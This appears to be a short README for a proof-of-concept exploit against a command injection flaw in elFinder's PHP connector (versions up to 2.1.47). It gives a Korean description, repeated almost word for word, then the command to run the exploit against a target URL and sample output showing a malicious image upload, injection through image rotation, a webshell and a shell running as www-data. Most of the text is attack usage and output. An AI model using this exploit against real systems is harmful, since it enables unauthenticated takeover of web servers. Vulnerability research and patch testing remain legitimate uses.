
elFinder <= 2.1.47의 PHP 커넥터 구성 요소를 통한 명령 삽입 취약점. 인증되지 않은 원격 코드 실행을 웹 서버 사용자 권한으로 허용합니다.
elFinder <= 2.1.47의 PHP 커넥터 구성 요소를 통한 명령 삽입 취약점입니다. 인증되지 않은 원격 코드 실행을 웹 서버 사용자 권한으로 허용합니다.
python3 exploit.py http://TARGET
$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)